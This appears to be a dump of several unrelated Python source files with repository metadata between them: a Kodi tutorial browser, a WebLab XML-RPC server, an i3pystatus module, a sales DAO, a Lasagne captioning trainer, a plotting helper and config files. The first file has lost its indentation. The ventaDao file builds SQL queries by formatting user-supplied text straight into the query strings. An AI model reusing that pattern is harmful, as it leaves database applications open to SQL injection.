# work. If not, see http://creativecommons.org/licenses/by-nc-nd/4.0.
# Please make sure you've read and understood the license, this code can NOT be used commercially
# and it can NOT be modified and redistributed. If you're found to be in breach of this license
# then any affected add-ons will be blacklisted and will not be able to work on the same system
# as any other add-ons which use this code. Thank you for your cooperation.
import os
import re
import sys
import urllib
import xbmc
import xbmcaddon
import xbmcgui
import xbmcplugin
import xbmcvfs
from directory import Add_Dir
from filetools import Text_File
from vartools import Find_In_Text
from guitools import Text_Box, Show_Busy, Keyboard
from systemtools import Sleep_If_Window_Active
from video import Play_Video
from web import Open_URL
dialog = xbmcgui.Dialog()
py_path = 'special://home/addons/script.module.python.koding.aio/lib/koding'
video_base = 'http://totalrevolution.tv/videos/python_koding/'
#----------------------------------------------------------------
def Grab_Tutorials():
""" internal command ~"""
import re
full_array = []
dirs,files = xbmcvfs.listdir(py_path)
# Check all the modules for functions with tutorial info
for file in files:
file_path = os.path.join(py_path,file)
if file.endswith('.py') and file != 'tutorials.py':
content = Text_File(file_path,'r').replace('\r','')
# content_array = re.compile('# TUTORIAL #\ndef (.+?)\(').findall(content)
content_array = Find_In_Text(content=content, start='# TUTORIAL #\ndef ', end='\(', show_errors=False)
if content_array:
for item in content_array:
item = item.strip()
full_array.append('%s~%s'%(item,file_path))
content_array = Find_In_Text(content=content, start='# TUTORIAL #\nclass ', end='\(', show_errors=False)
if content_array:
for item in content_array:
item = item.strip()
full_array.append('%s~%s'%(item,file_path))
# Return a list of tutorials
Add_Dir('[COLOR=gold]CREATE YOUR FIRST ADD-ON[/COLOR]',video_base+'Create_Addon.mov','play_video', folder=False, icon='', fanart='', description='How to create your own add-on using the Python Koding framework.')
for item in sorted(full_array,key=str.lower):
name, filepath = item.split('~')
filepath = urllib.quote(filepath)
Add_Dir(name=name.upper().replace('_',' '), url='%s~%s'%(name,filepath), mode='show_tutorial', folder=False, icon='', fanart='', description='Instructions for how to use the %s function.'%name)
#----------------------------------------------------------------
def Show_Tutorial(url):
""" internal command ~"""
name, filepath = url.split('~')
filepath = urllib.unquote(filepath)
readfile = Text_File(filepath,'r').replace('\r','')
try:
raw_find = Find_In_Text(content=readfile, start='# TUTORIAL #\ndef %s' % name,end='~"""')[0]
except:
raw_find = Find_In_Text(content=readfile, start='# TUTORIAL #\nclass %s' % name,end='~"""')[0]
# Check if an example code segment exists in the comments
if 'EXAMPLE CODE:' in raw_find:
code = re.findall(r'(?<=EXAMPLE CODE:)(?s)(.*$)', raw_find)[0]
code = code.replace('script.module.python.koding.aio','temp_replace_string')
code = code.replace('koding.','').strip()
code = code.replace('temp_replace_string','script.module.python.koding.aio')
else:
code = None
# Check if a video exists in the comments
internetstate = xbmc.getInfoLabel('System.InternetState')
if internetstate:
video_page = Open_URL(video_base)
extension = Find_In_Text(video_page, name, '"', False)
if extension != '' and extension != None:
video = video_base+name+extension[0]
else:
video = None
else:
video = None
counter = 0
removal_string = ''
final_header = ''
newline = ''
temp_raw = raw_find.splitlines()
for line in temp_raw:
if counter == 0:
removal_string += line
if '[' in line:
replace_file = Find_In_Text(content=line,start='\[',end='\]')
for item in replace_file:
line = line.replace(item,'')
if ',' in line:
header_extension = line.split(',')
for item in header_extension:
if '=' in item:
item = item.split('=')[0]
final_header += item+','
final_header = 'koding.'+name+final_header[:-2]+')'
else:
final_header = 'koding.'+name+line[:-1]
else:
removal_string += '\n'+line
counter += 1
if counter == 2:
break
if final_header.endswith('))'):
final_header = final_header[:-1]
if final_header.startswith('koding.User_Info'):
final_header = 'koding.User_Info()'
full_text = raw_find.replace(removal_string,'').strip()
# Initialise the dialog select
dialog_array = ['Documentation']
if code:
dialog_array.append('Run Example Code')
if video:
dialog_array.append('Watch Video')
# If there's more than one item we show a dialog select otherwise we just load up the text window
if len(dialog_array) > 1:
choice = dialog.select(name, dialog_array)
if choice >= 0:
choice = dialog_array[choice]
if choice == 'Documentation':
Text_Box(final_header,full_text
.replace('AVAILABLE PARAMS:','[COLOR=dodgerblue]AVAILABLE PARAMS:[/COLOR]')
.replace('EXAMPLE CODE:','[COLOR=dodgerblue]EXAMPLE CODE:[/COLOR]')
.replace('IMPORTANT:','[COLOR=gold]IMPORTANT:[/COLOR]')
.replace('CODE:','[COLOR=dodgerblue]CODE:[/COLOR]')
.replace('AVAILABLE VALUES:','[COLOR=dodgerblue]AVAILABLE VALUES:[/COLOR]')
.replace('WARNING:','[COLOR=red]WARNING:[/COLOR]'))
elif choice == 'Run Example Code':
codefile = filepath.split(os.sep)
codefile = codefile[len(codefile)-1].replace('.py','')
exec('from %s import *' % codefile)
# exec('from %s import %s' % (codefile, params["name"]))
exec(code)
elif choice == 'Watch Video':
Play_Video(video)
if choice < 0:
return
else:
Text_Box(final_header,full_text
.replace('AVAILABLE PARAMS:','[COLOR=dodgerblue]AVAILABLE PARAMS:[/COLOR]')
.replace('EXAMPLE CODE:','[COLOR=dodgerblue]EXAMPLE CODE:[/COLOR]')
.replace('IMPORTANT:','[COLOR=gold]IMPORTANT:[/COLOR]')
.replace('CODE:','[COLOR=dodgerblue]CODE:[/COLOR]')
.replace('AVAILABLE VALUES:','[COLOR=dodgerblue]AVAILABLE VALUES:[/COLOR]')
.replace('WARNING:','[COLOR=red]WARNING:[/COLOR]'))
| gpl-2.0 | -4,688,523,344,214,192,000 | 42.893491 | 216 | 0.588434 | false |
zstars/weblabdeusto | experiments/managed/libs/server/python/weblab_server.py | 1 | 2986 | #!/usr/bin/env python
#-*-*- encoding: utf-8 -*-*-
#
# Copyright (C) 2005-2009 University of Deusto
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# This software consists of contributions made by many individuals,
# listed below:
#
# Author: Pablo Orduña <[email protected]>
#
"""
There are two ways of implementing an Experiment Server in
Python:
* Using the WebLab infrastructure (see weblab.experiment.experiments)
* As standalone simple applications, as this one
The advantage of the first approach is that the developer has access
to all the tools provided by voodoo, including the deployment tools.
An experiment developed this way can be in the same process as the
Laboratory Server, or communicate in a faster way.
However, the second approach is far simpler for a programmer not
involved or new to the WebLab-Deusto project.
In order to use the second approach, you should make a class that
inherits from ExperimentServer, and use the launch method to run it :-)
"""
import SimpleXMLRPCServer
class ExperimentServer(object):
def test_me(self, message):
return message
def is_up_and_running(self):
return True
def start_experiment(self, client_initial_data, server_initial_data):
return "{}"
def send_file(self, content, file_info):
return "ok"
def send_command(self, command_string):
return "ok"
def dispose(self):
return "{}"
def should_finish(self):
return 0
def get_api(self):
return "2"
class WebLabHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
rpc_paths = '/','/RPC2','/weblab/xmlrpc','/weblab/xmlrpc/','/weblab','/weblab/'
class Launcher(object):
def __init__(self, port, experiment_server):
super(Launcher, self).__init__()
self.port = port
self.experiment_server = experiment_server
def start(self):
self.server = SimpleXMLRPCServer.SimpleXMLRPCServer(("localhost", self.port), WebLabHandler)
self.server.register_function(self.experiment_server.test_me, "Util.test_me")
self.server.register_function(self.experiment_server.is_up_and_running, "Util.is_up_and_running")
self.server.register_function(self.experiment_server.start_experiment, "Util.start_experiment")
self.server.register_function(self.experiment_server.send_file, "Util.send_file_to_device")
self.server.register_function(self.experiment_server.send_command, "Util.send_command_to_device")
self.server.register_function(self.experiment_server.dispose, "Util.dispose")
self.server.register_function(self.experiment_server.get_api, "Util.get_api")
self.server.register_function(self.experiment_server.should_finish, "Util.should_finish")
print "Running XML-RPC server on port %i" % self.port
self.server.serve_forever()
| bsd-2-clause | 3,668,985,022,238,411,000 | 33.709302 | 105 | 0.706198 | false |
juliushaertl/i3pystatus | i3pystatus/updates/__init__.py | 1 | 3829 | import threading
from i3pystatus import SettingsBase, Module, formatp
from i3pystatus.core.util import internet, require
class Backend(SettingsBase):
settings = ()
updates = 0
class Updates(Module):
"""
Generic update checker.
To use select appropriate backend(s) for your system.
For list of all available backends see :ref:`updatebackends`.
Left clicking on the module will refresh the count of upgradeable packages.
This may be used to dismiss the notification after updating your system.
.. rubric:: Available formatters
* `{count}` — Sum of all available updates from all backends.
* For each backend registered there is one formatter named after the backend,
multiple identical backends do not accumulate, but overwrite each other.
* For example, `{Cower}` (note capitcal C) is the number of updates reported by
the cower backend, assuming it has been registered.
.. rubric:: Usage example
::
from i3pystatus import Status
from i3pystatus.updates import pacman, cower
status = Status(standalone=True)
status.register("updates",
format = "Updates: {count}",
format_no_updates = "No updates",
backends = [pacman.Pacman(), cower.Cower()])
status.run()
"""
interval = 3600
settings = (
("backends", "Required list of backends used to check for updates."),
("format", "Format used when updates are available. "
"May contain formatters."),
("format_no_updates", "String that is shown if no updates are available."
" If not set the module will be hidden if no updates are available."),
("format_working", "Format used while update queries are run. By default the same as ``format``."),
"color",
"color_no_updates",
"color_working",
("interval", "Default interval is set to one hour."),
)
required = ("backends",)
backends = None
format = "Updates: {count}"
format_no_updates = None
format_working = None
color = "#00DD00"
color_no_updates = "#FFFFFF"
color_working = None
on_leftclick = "run"
def init(self):
if not isinstance(self.backends, list):
self.backends = [self.backends]
if self.format_working is None: # we want to allow an empty format
self.format_working = self.format
self.color_working = self.color_working or self.color
self.data = {
"count": 0
}
self.condition = threading.Condition()
self.thread = threading.Thread(target=self.update_thread, daemon=True)
self.thread.start()
def update_thread(self):
self.check_updates()
while True:
with self.condition:
self.condition.wait(self.interval)
self.check_updates()
@require(internet)
def check_updates(self):
self.output = {
"full_text": formatp(self.format_working, **self.data).strip(),
"color": self.color_working,
}
updates_count = 0
for backend in self.backends:
updates = backend.updates
updates_count += updates
self.data[backend.__class__.__name__] = updates
if updates_count == 0:
self.output = {} if not self.format_no_updates else {
"full_text": self.format_no_updates,
"color": self.color_no_updates,
}
return
self.data["count"] = updates_count
self.output = {
"full_text": formatp(self.format, **self.data).strip(),
"color": self.color,
}
def run(self):
with self.condition:
self.condition.notify()
| mit | 3,242,534,360,093,105,000 | 30.628099 | 107 | 0.597857 | false |
git-pedro-77/PROYECTOFINALPYTHON | proyectoITSAE/ec/edu/itsae/dao/ventaDao.py | 1 | 2654 | # coding:utf-8
'''
Created on 27/1/2015
@author: Programacion
'''
from ec.edu.itsae.conn import DBcon
#from flask import redirect, url_for
import json
class VentaDao(DBcon.DBcon):#heredando
'''
classdocs
'''
def __init__(self):
'''
Constructor
'''
pass#sirve cuando no hay implementacion en el metodo
def reportarventa(self):
con=self.conexion().connect().cursor() #capturando de la clase DBcon
con.execute(" select * from venta ")
reporte=con.fetchall()
return reporte #despues del return no se debe colocar nada
def grabarVenta(self, vendedor, turno, fechaventa,gestion ):
con=self.conexion().connect()
sql= """insert into venta(vendedor, turno, fechaventa, gestion)
values ('%s','%s', '%s','%s')
""" %(vendedor, turno, fechaventa,gestion )
#print sql Para imprimir nuestra consulta para poder ver
with con:
cursor=con.cursor()
cursor.execute(sql)#aqui debe estar sql para que se ejecute el insert
#deber actualizar y eliminar
''' def eliminarCliente(self,datoelim):
con=self.conexion().connect()
sql= """ delete from cliente where id_cliente= %i """ %int(datoelim)
#print sql Para imprimir nuestra consulta para poder ver
with con:
cursor=con.cursor()
cursor.execute(sql)'''
def buscarVentaFactura(self, datobusca):
con=self.conexion().connect().cursor()
con.execute(""" select CONCAT (nombre,' ', apellido) as value, id_cliente as id from cliente where upper(CONCAT (nombre,' ', apellido)) like upper('%s') """ %("%"+datobusca+"%") )
reporte=con.fetchall()
columna=('value', 'id')
lista=[]
for row in reporte:
lista.append(dict(zip(columna,row)))
return json.dumps(lista, indent=2)
def buscarVentaDato(self, datobuscado):
con=self.conexion().connect().cursor()
sql=""" select * from cliente where upper(CONCAT (nombre,' ', apellido)) like upper('%s') """ %("%"+datobuscado+"%")
con.execute(sql)
reporte=con.fetchall()
return reporte
def validarventa(self, datot):
con=self.conexion().connect().cursor()
sql=""" select * from personas p, trabajador t where t.idpersona=%i """ %(datot)
con.execute(sql)
reporte=con.fetchall()
return reporte
| gpl-2.0 | -8,052,328,900,098,061,000 | 32.051282 | 187 | 0.558779 | false |
erfannoury/capgen-lasagne | another no-ft-ln-hs-largelr.py | 1 | 13876 | from __future__ import division, print_function
import logging
import numpy as np
import scipy as sc
import skimage
from skimage import transform
import theano
import theano.tensor as T
import lasagne
import sys
import cPickle as pickle
from datetime import datetime
from collections import OrderedDict
from mscoco_threaded_iter import COCOCaptionDataset
sys.path.append('/home/noury/codevault/Recipes/modelzoo/')
sys.path.append('/home/noury/codevault/seq2seq-lasagne/')
from resnet50 import build_model
from CustomLSTMLayer import LNLSTMLayer
from HierarchicalSoftmax import HierarchicalSoftmaxLayer
from LayerNormalization import LayerNormalizationLayer
sys.setrecursionlimit(10000)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(message)s', '%m/%d/%Y %I:%M:%S %p')
fh = logging.FileHandler('another_no_ft_ln_hs_largelr.log')
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
sh = logging.StreamHandler(sys.stdout)
sh.setLevel(logging.INFO)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
logger.info('Loading the ResNet50 model.')
# First get the ResNet50 model
resnet_weights_path = '/home/noury/modelzoo/resnet50.pkl'
resnet = build_model()
model_params = pickle.load(open(resnet_weights_path, 'rb'))
lasagne.layers.set_all_param_values(resnet['prob'], model_params['values'])
mean_im = model_params['mean_image'].reshape((1, 3, 224, 224)).astype(np.float32)
# Load the files needed for the MS COCO Captions dataset
train_images_path = '/home/noury/datasets/mscoco/train2014'
valid_images_path = '/home/noury/datasets/mscoco/val2014'
train_annotations_filepath = '/home/noury/datasets/mscoco/annotations/captions_train2014.json'
valid_annotations_filepath = '/home/noury/datasets/mscoco/annotations/captions_val2014.json'
coco_captions = pickle.load(open('coco_captions_trainval2014.pkl', 'rb'))
train_buckets = coco_captions['train buckets']
valid_buckets = coco_captions['valid buckets']
wordset = coco_captions['raw wordset']
word2idx = {}
word2idx['<PAD>'] = 0
word2idx['<GO>'] = 1
word2idx['<EOS>'] = 2
for i, w in enumerate(wordset):
word2idx[w] = i+3
idx2word = map(lambda x: x[0], sorted(word2idx.items(), key=lambda x: x[1]))
bucket_minibatch_sizes = {16:256, 32:128, 64:64}
logger.info('Creating global variables')
CONTINUE = False
HIDDEN_SIZE = 2048
EMBEDDING_SIZE = 300
WORD_SIZE = len(idx2word)
DENSE_SIZE = 1024
ORDER_VIOLATION_COEFF = 10.0
L2_COEFF = 1e-3
RNN_GRAD_CLIP = 64
TOTAL_MAX_NORM = 128
RECURR_LR = theano.shared(np.float32(0.001), 'recurrent lr')
EPOCH_LR_COEFF = np.float32(0.5)
NUM_EPOCHS = 15
validation_losses = []
total_loss_values = []
order_embedding_loss_values = []
l2_values = []
recurrent_norm_values = []
validation_total_loss_values = []
validation_order_embedding_loss_values = []
validation_l2_values = []
logger.info('Building the network.')
im_features = lasagne.layers.get_output(resnet['pool5'])
im_features = T.flatten(im_features, outdim=2) # batch size, number of features
cap_out_var = T.imatrix('cap_out') # batch size, seq len
cap_in_var = T.imatrix('cap_in') # batch size, seq len
mask_var = T.bmatrix('mask_var') # batch size, seq len
l_hid = lasagne.layers.InputLayer((None, HIDDEN_SIZE), input_var=im_features, name="l_hid")
gate = lasagne.layers.Gate(W_in=lasagne.init.Normal(0.02), W_hid=lasagne.init.Orthogonal(),
W_cell=lasagne.init.Normal(), b=lasagne.init.Constant(0.0))
cell_gate = lasagne.layers.Gate(W_in=lasagne.init.Normal(0.02), W_hid=lasagne.init.Orthogonal(),
W_cell=None, b=lasagne.init.Constant(0.0),
nonlinearity=lasagne.nonlinearities.tanh)
forget_gate = lasagne.layers.Gate(W_in=lasagne.init.Normal(0.02), W_hid=lasagne.init.Orthogonal(),
W_cell=lasagne.init.Normal(), b=lasagne.init.Constant(5.0))
l_in = lasagne.layers.InputLayer((None, None), cap_in_var, name="l_in")
l_mask = lasagne.layers.InputLayer((None, None), mask_var, name="l_mask")
l_emb = lasagne.layers.EmbeddingLayer(l_in, input_size=WORD_SIZE, output_size=EMBEDDING_SIZE, name="l_emb")
l_lstm = LNLSTMLayer(l_emb, HIDDEN_SIZE, ingate=gate, forgetgate=forget_gate, cell=cell_gate,
outgate=gate, hid_init=l_hid, peepholes=False, grad_clipping=RNN_GRAD_CLIP,
mask_input=l_mask, precompute_input=False,
alpha_init=lasagne.init.Constant(0.1), # as suggested by Ryan Kiros on Twitter
normalize_cell=False,
name="l_lstm") # batch size, seq len, hidden size
l_reshape = lasagne.layers.ReshapeLayer(l_lstm, (-1, [2]), name="l_reshape") # batch size * seq len, hidden size
l_fc = lasagne.layers.DenseLayer(l_reshape, DENSE_SIZE, b=lasagne.init.Constant(5.0),
nonlinearity=lasagne.nonlinearities.rectify, name="l_fc")
l_drp = lasagne.layers.DropoutLayer(l_fc, 0.3, name="l_drp")
l_hs = HierarchicalSoftmaxLayer(l_drp, WORD_SIZE, name="l_hs") # batch size * seq len, WORD SIZE
l_slice = lasagne.layers.SliceLayer(l_lstm, -1, axis=1, name="l_slice")
if CONTINUE:
import glob
param_values = glob.glob('another_no_ft_ln_hs_largelr_param_values_*.pkl')
max_epoch = max(map(lambda x: int(x[len('another_no_ft_ln_hs_largelr_param_values_'):-len('.pkl')]), param_values))
logger.info('Continue training from epoch {}'.format(max_epoch + 1))
logger.info('Setting previous parameter values from epoch {}'.format(max_epoch))
logger.info('Setting model weights from epoch {}'.format(max_epoch))
param_values_file = 'another_no_ft_ln_hs_largelr_param_values_{}.pkl'.format(max_epoch)
param_values = pickle.load(open(param_values_file, 'rb'))
lasagne.layers.set_all_param_values(l_hs, param_values['recurrent'])
lasagne.layers.set_all_param_values(resnet['pool5'], param_values['resnet'])
RECURR_LR = theano.shared(np.float32(param_values['lr']), 'recurrent lr')
[total_loss_values, order_embedding_loss_values, l2_values,
recurrent_norm_values]= pickle.load(open('another_no_ft_ln_hs_largelr_training_losses.pkl', 'rb'))
[validation_total_loss_values, validation_order_embedding_loss_values,
validation_l2_values] = pickle.load(open('another_no_ft_ln_hs_largelr_validation_losses.pkl', 'rb'))
[validation_losses, recurr_lr_val] = pickle.load(open('another_no_ft_ln_hs_largelr_artifacts.pkl', 'rb'))
logger.info('Creating output and loss variables')
prediction = lasagne.layers.get_output(l_hs, deterministic=False)
flat_cap_out_var = T.flatten(cap_out_var, outdim=1)
flat_mask_var = T.flatten(lasagne.layers.get_output(l_mask), outdim=1)
loss = T.mean(lasagne.objectives.categorical_crossentropy(prediction, flat_cap_out_var)[flat_mask_var.nonzero()])
caption_features = lasagne.layers.get_output(l_slice, deterministic=False)
order_embedding_loss = T.pow(T.maximum(0, caption_features - im_features), 2).mean()
l2 = lasagne.regularization.regularize_network_params(l_hs, lasagne.regularization.l2)
total_loss = loss + ORDER_VIOLATION_COEFF * order_embedding_loss + L2_COEFF * l2
deterministic_prediction = lasagne.layers.get_output(l_hs, deterministic=True)
deterministic_captions = lasagne.layers.get_output(l_slice, deterministic=True)
deterministic_loss = T.mean(lasagne.objectives.categorical_crossentropy(deterministic_prediction, flat_cap_out_var)[flat_mask_var.nonzero()])
deterministic_order_embedding_loss = T.pow(T.maximum(0, deterministic_captions - im_features), 2).mean()
deterministic_l2 = lasagne.regularization.regularize_network_params(l_hs, lasagne.regularization.l2)
deterministic_total_loss = deterministic_loss + ORDER_VIOLATION_COEFF * deterministic_order_embedding_loss \
+ L2_COEFF * deterministic_l2
logger.info('Getting all parameters and creating update rules.')
recurrent_params = lasagne.layers.get_all_params(l_hs, trainable=True)
recurrent_grads = T.grad(total_loss, recurrent_params)
recurrent_grads, recurrent_norm = lasagne.updates.total_norm_constraint(recurrent_grads, TOTAL_MAX_NORM, return_norm=True)
recurrent_updates = lasagne.updates.rmsprop(recurrent_grads, recurrent_params, learning_rate=RECURR_LR)
logger.info("Creating the Theano function for Adam update")
train_fun = theano.function([resnet['input'].input_var, cap_in_var, mask_var, cap_out_var],
[total_loss, order_embedding_loss, l2, recurrent_norm],
updates=recurrent_updates)
logger.info("Creating the evaluation Theano function")
eval_fun = theano.function([resnet['input'].input_var, cap_in_var, mask_var, cap_out_var],
[deterministic_total_loss, deterministic_order_embedding_loss, deterministic_l2])
logger.info('Loading the COCO Captions training and validation sets.')
coco_train = COCOCaptionDataset(train_images_path, train_annotations_filepath, train_buckets,
bucket_minibatch_sizes, word2idx, mean_im, True)
coco_valid = COCOCaptionDataset(valid_images_path, valid_annotations_filepath, valid_buckets,
bucket_minibatch_sizes, word2idx, mean_im, False)
logger.info("Starting the training process...")
START = 1
if CONTINUE:
START = max_epoch + 1
for e in xrange(START, NUM_EPOCHS + 1):
logger.info("Starting epoch".format(e))
if len(validation_losses) > 2 and \
validation_losses[-3] < validation_losses[-1] and \
validation_losses[-2] < validation_losses[-1]:
RECURR_LR.set_value(RECURR_LR.get_value() * EPOCH_LR_COEFF)
logger.info("Lowering the learning rate to {}".format(RECURR_LR.get_value()))
logger.info("Starting training on epoch {} with LR = {}".format(e, RECURR_LR.get_value()))
mb = 0
now = datetime.now()
for im, cap_in, cap_out in coco_train:
tl, oe, el2, recn = train_fun(im, cap_in, (cap_in > 0).astype(np.int8), cap_out)
logger.debug("Epoch: {}, Minibatch: {}, Total Loss: {}, Order-embedding loss: {}, L2 value: {}, Recurrent norm: {}".format(e, mb, tl, oe, el2, recn))
total_loss_values.append(tl)
order_embedding_loss_values.append(oe)
l2_values.append(el2)
recurrent_norm_values.append(recn)
mb += 1
logger.info("Training epoch {} took {}.".format(e, datetime.now() - now))
logger.info("Epoch {} results:".format(e))
logger.info("\t\tMean total loss: {}".format(np.mean(total_loss_values[-mb:])))
logger.info("\t\tMean order embedding loss: {}".format(np.mean(order_embedding_loss_values[-mb:])))
logger.info("\t\tMean l2 value: {}".format(np.mean(l2_values[-mb:])))
logger.info("\t\tMean Recurrent norm: {}".format(np.mean(recurrent_norm_values[-mb:])))
logger.info("Saving model parameters for epoch {}".format(e))
pickle.dump({'resnet':lasagne.layers.get_all_param_values(resnet['pool5']),
'recurrent':lasagne.layers.get_all_param_values(l_hs),
'mean image':mean_im,
'lr':RECURR_LR.get_value()},
open('another_no_ft_ln_hs_largelr_param_values_{}.pkl'.format(e), 'wb'), protocol=-1)
logger.info("Saving loss values for epoch {}".format(e))
pickle.dump([total_loss_values, order_embedding_loss_values, l2_values,
recurrent_norm_values],
open('another_no_ft_ln_hs_largelr_training_losses.pkl', 'wb'), protocol=-1)
logger.info("Validating the model on epoch {} on the validation set.".format(e))
mb = 0
now = datetime.now()
for im, cap_in, cap_out in coco_valid:
tl, oe, el2 = eval_fun(im, cap_in, (cap_in > 0).astype(np.int8), cap_out)
logger.debug("Validation epoch: {}, Minibatch: {}, Validation total loss: {}, Validation order-embedding loss: {}, Validation l2 value: {}".format(e, mb, tl, oe, el2))
validation_total_loss_values.append(tl)
validation_order_embedding_loss_values.append(oe)
validation_l2_values.append(el2)
mb += 1
logger.info("Validating epoch {} took {}.".format(e, datetime.now() - now))
logger.info("Epoch {} validation results:".format(e))
logger.info("\t\tValidation mean total loss: {}".format(np.mean(validation_total_loss_values[-mb:])))
logger.info("\t\tValidation mean order-embedding loss: {}".format(np.mean(validation_order_embedding_loss_values[-mb:])))
logger.info("\t\tValidation mean l2 value: {}".format(np.mean(validation_l2_values[-mb:])))
validation_losses.append(np.mean(validation_total_loss_values[-mb:]))
logger.info("Saving validation loss values for epoch {}".format(e))
pickle.dump([validation_total_loss_values, validation_order_embedding_loss_values, validation_l2_values],
open('another_no_ft_ln_hs_largelr_validation_losses.pkl', 'wb'), protocol=-1)
pickle.dump([validation_losses, RECURR_LR.get_value()], open('another_no_ft_ln_hs_largelr_artifacts.pkl', 'wb'),
protocol=-1)
| mit | 2,184,633,508,584,648,400 | 55.868852 | 179 | 0.652061 | false |
goulu/Goulib | Goulib/plot.py | 1 | 4898 | """
plotable rich object display on IPython/Jupyter notebooks
"""
__author__ = "Philippe Guglielmetti"
__copyright__ = "Copyright 2015, Philippe Guglielmetti"
__credits__ = []
__license__ = "LGPL"
# import matplotlib and set backend once for all
from . import itertools2
import os
import io
import sys
import logging
import base64
import matplotlib
if os.getenv('TRAVIS'): # are we running https://travis-ci.org/ automated tests ?
matplotlib.use('Agg') # Force matplotlib not to use any Xwindows backend
elif sys.gettrace(): # http://stackoverflow.com/questions/333995/how-to-detect-that-python-code-is-being-executed-through-the-debugger
matplotlib.use('Agg') # because 'QtAgg' crashes python while debugging
else:
pass
# matplotlib.use('pdf') #for high quality pdf, but doesn't work for png, svg ...
logging.info('matplotlib backend is %s' % matplotlib.get_backend())
class Plot(object):
"""base class for plotable rich object display on IPython notebooks
inspired from http://nbviewer.ipython.org/github/ipython/ipython/blob/3607712653c66d63e0d7f13f073bde8c0f209ba8/docs/examples/notebooks/display_protocol.ipynb
"""
def _plot(self, ax, **kwargs):
"""abstract method, must be overriden
:param ax: `matplotlib.axis`
:return ax: `matplotlib.axis` after plot
"""
raise NotImplementedError(
'objects derived from plot.PLot must define a _plot method')
return ax
def render(self, fmt='svg', **kwargs):
return render([self], fmt, **kwargs) # call global function
def save(self, filename, **kwargs):
return save([self], filename, **kwargs) # call global function
# for IPython notebooks
def _repr_html_(self):
"""default rich format is svg plot"""
try:
return self._repr_svg_()
except NotImplementedError:
pass
# this returns the same as _repr_png_, but is Table compatible
buffer = self.render('png')
s = base64.b64encode(buffer).decode('utf-8')
return '<img src="data:image/png;base64,%s">' % s
def html(self, **kwargs):
from IPython.display import HTML
return HTML(self._repr_html_(**kwargs))
def svg(self, **kwargs):
from IPython.display import SVG
return SVG(self._repr_svg_(**kwargs))
def _repr_svg_(self, **kwargs):
return self.render(fmt='svg', **kwargs).decode('utf-8')
def png(self, **kwargs):
from IPython.display import Image
return Image(self._repr_png_(**kwargs), embed=True)
def _repr_png_(self, **kwargs):
return self.render(fmt='png', **kwargs)
def plot(self, **kwargs):
""" renders on IPython Notebook
(alias to make usage more straightforward)
"""
return self.svg(**kwargs)
def render(plotables, fmt='svg', **kwargs):
"""renders several Plot objects"""
import matplotlib.pyplot as plt
# extract optional arguments used for rasterization
printargs, kwargs = itertools2.dictsplit(
kwargs,
['dpi', 'transparent', 'facecolor', 'background', 'figsize']
)
ylim = kwargs.pop('ylim', None)
xlim = kwargs.pop('xlim', None)
title = kwargs.pop('title', None)
fig, ax = plt.subplots()
labels = kwargs.pop('labels', [None] * len(plotables))
# slightly shift the points to make superimposed curves more visible
offset = kwargs.pop('offset', 0)
for i, obj in enumerate(plotables):
if labels[i] is None:
labels[i] = str(obj)
if not title:
try:
title = obj._repr_latex_()
# check that title can be used in matplotlib
from matplotlib.mathtext import MathTextParser
parser = MathTextParser('path').parse(title)
except Exception as e:
title = labels[i]
ax = obj._plot(ax, label=labels[i], offset=i * offset, **kwargs)
if ylim:
plt.ylim(ylim)
if xlim:
plt.xlim(xlim)
ax.set_title(title)
if len(labels) > 1:
ax.legend()
output = io.BytesIO()
fig.savefig(output, format=fmt, **printargs)
data = output.getvalue()
plt.close(fig)
return data
def png(plotables, **kwargs):
from IPython.display import Image
return Image(render(plotables, 'png', **kwargs), embed=True)
def svg(plotables, **kwargs):
from IPython.display import SVG
return SVG(render(plotables, 'svg', **kwargs))
plot = svg
def save(plotables, filename, **kwargs):
ext = filename.split('.')[-1].lower()
kwargs.setdefault('dpi', 600) # force good quality
return open(filename, 'wb').write(render(plotables, ext, **kwargs))
| lgpl-3.0 | 139,288,707,879,006,940 | 29.6 | 161 | 0.611066 | false |
asnt/fablablux-schedule | fablab_schedule/config.py | 1 | 2177 | import logging
import os
from pkg_resources import resource_filename
try:
# Python 3
import configparser
except ImportError:
# Python 2
import ConfigParser as configparser
logger = logging.getLogger(__name__)
config_dir = "/etc/fablab_schedule/"
config_filename = "fablab_schedule.cfg"
example_config_filename = "fablab_schedule.cfg.example"
_config = None
def get_default_config_file_path():
return resource_filename("fablab_schedule",
"conf/" + example_config_filename)
def get_global_config_file_path():
path = os.path.join(config_dir, config_filename)
return path
def parse_float_list(text, delimiter=","):
return [float(value) for value in text.split(delimiter)]
def make_config_dict_from_parser(parser):
config = {}
if "api" in parser:
config["username"] = parser.get("api", "username")
config["password"] = parser.get("api", "password")
config["base_url"] = parser.get("api", "base_url")
if "table" in parser:
config["n_machines"] = parser.getint("table", "n_machines")
config["n_slots"] = parser.getint("table", "n_slots")
row_offsets = parser.get("table", "row_offsets")
config["row_offsets"] = parse_float_list(row_offsets)
column_offsets = parser.get("table", "column_offsets")
config["column_offsets"] = parse_float_list(column_offsets)
config["slot_size"] = parser.getint("table", "slot_size")
if "camera" in parser:
config["vertical_flip"] = parser.getboolean("camera", "vertical_flip")
config["horizontal_flip"] = parser.getboolean("camera",
"horizontal_flip")
return config
def get():
global _config
if _config is None:
parser = configparser.ConfigParser()
parser.read_file(open(get_default_config_file_path()))
parser.read(get_global_config_file_path())
_config = make_config_dict_from_parser(parser)
return _config
def from_file(filepath):
parser = configparser.ConfigParser()
parser.read_file(open(filepath))
return make_config_dict_from_parser(parser)
| gpl-3.0 | -1,449,656,808,628,135,200 | 29.661972 | 78 | 0.638493 | false |
kizbitz/tippet | docs/source/conf.py | 1 | 8141 | # -*- coding: utf-8 -*-
#
# tippet documentation build configuration file, created by
# sphinx-quickstart on Sun Mar 23 09:56:57 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
